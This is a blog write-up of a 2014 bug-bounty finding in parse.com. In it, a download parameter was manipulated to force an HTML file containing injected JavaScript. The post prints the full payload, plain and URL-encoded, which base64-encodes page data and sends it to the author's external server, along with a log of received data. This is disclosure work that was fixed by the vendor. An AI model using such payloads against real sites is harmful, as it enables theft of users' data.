Safetech Blog - Security Tips and Tricks


by Ionut Cernica

Parse.com security problem

This is a writeup for a security problem in parse.com website. Parse.com is an acquisition of facebook and every security problem on this website is eligible for a bounty in the facebook bugbounty program.

 

There was a problem with the download URL for important information about the applications you manage on your account.

The proof of concept bellow was made on: Windows 7 Ultimate and was tested on IE, Chrome and Firefox.

 

 

Go to your parse.com account and try to download a file with important data:

1

 

After pressing the button from the image above, the following request is sent to the server:

 

www.parse.com/apps/…………………………………&endpoints[1][performanceType]=request_limit

 

The last parameter from our request is endpoints[1][performanceType], if the value is changed with request_limit.html”, then the file will be no longer .csv, will be .html

 

As Proof of concept of the idea above, I sent to the server the following GET Request:

www.parse.com/apps/…………………………………….&endpoints[1][performanceType]=request_limit.html

 

The response was:

2

 

In chrome and IE didn’t work, but after a little research (1 hour) I find out how to force the file extension from .csv to .html in Chrome and IE.

To work on IE and Chrome change .html” to .html-Payload-“.html;-Payload

 

PROOF OF CONCEPT:

Authenticate in your parse.com account.

 

My malicious payload is:

 

.html”JUNKCODEJUNKCODEJUNKCODE.html;<html><body onload=’getValue()’><script>function utf8_to_b64( str ){return window.btoa(unescape(encodeURIComponent( str )));}function getValue(){var x = utf8_to_b64(document.getElementById(‘test’).innerHTML);document.location= ‘http://www.whit3hat.com/****for_private_reasons_I_hide_this_url****/1.php?n=’+x;}</script><h1 id=’test’>HERE_WILL_BE_IMPOTANT_DATA_FROM_VICTIM

 

 

 

If our victim will click on:

 

www.parse.com/apps/……………………..&endpoints[1][performanceType]=request_limit.html”JUNKCODEJUNKCODEJUNKCODE.html;<html><body onload=’getValue()’><script>function utf8_to_b64( str ){return window.btoa(unescape(encodeURIComponent( str )));}function getValue(){var x = utf8_to_b64(document.getElementById(‘test’).innerHTML);document.location= ‘http://www.whit3hat.com/**********?n=’+x;}</script><h1 id=’test’>”

 

The victim will download an html file that contains our malicious html+javascript payload. The payload above will copy all the text is after <h1 id=’test’>,will encode it on base64 and it will send to my controlled server.

 

 

So, first send the request to the server: (I used URL encoding)

www.parse.com/apps/……………&endpoints%5B1%5D%5BperformanceType%5D=request_limit%2e%68%74%6d%6c%22%4a%55%4e%4b%43%4f%44%45%4a%55%4e%4b%43%4f%44%45%4a%55%4e%4b%43%4f%44%45%2e%68%74%6d%6c%3b%3c%68%74%6d%6c%3e%3c%62%6f%64%79%20%6f%6e%6c%6f%61%64%3d%27%67%65%74%56%61%6c%75%65%28%29%27%3e%2e%68%74%6d%6c%3b%3c%73%63%72%69%70%74%3e%66%75%6e%63%74%69%6f%6e%20%75%74%66%38%5f%74%6f%5f%62%36%34%28%20%73%74%72%20%29%7b%72%65%74%75%72%6e%20%77%69%6e%64%6f%77%2e%62%74%6f%61%28%75%6e%65%73%63%61%70%65%28%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%20%73%74%72%20%29%29%29%3b%7d%66%75%6e%63%74%69%6f%6e%20%67%65%74%56%61%6c%75%65%28%29%7b%76%61%72%20%78%20%3d%20%75%74%66%38%5f%74%6f%5f%62%36%34%28%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%74%65%73%74%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%29%3b%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%77%68%69%74%33%68%61%74%2e%63%6f%6d%2f%74%65%73%74%2f%31%2e%70%68%70%3f%6e%3d%27%2b%78%3b%7d%3c%2f%73%63%72%69%70%74%3e%3c%68%31%20%69%64%3d%27%74%65%73%74%27%3e%22

 

What is URL encoded is my malicious payload.

The response will be: (Chrome browser, but was tested in IE and Firefox and worked)

3

 

Chrome automatically downloaded the file as html.

This security problem requires user interaction -> if the downloaded file is opened, then all the data will be sent to my server:

4

 

If I look into the logs, I will have the following data:

ip: 83.***.***.** Data:IiIiCjIwMTQtMDYtMTdUMjA6MDA6MDAuMDAwWiwwLDAKMjAxNC0wNi0xN1QyMDowMTowMC4wMDBaLDA…………………………………………………………………………………………….

 

As you can see, the content from the html file was sent to my server as base64. I used base64 because of the character \n (0x0a) known as new line from the html file.

 

I was impressed that the facebook team have moved quickly:

Reported: 16 June 2014

Fixed: 20 June 2014

600 total views, 1 views today





Leave a Reply

Your email address will not be published. Required fields are marked *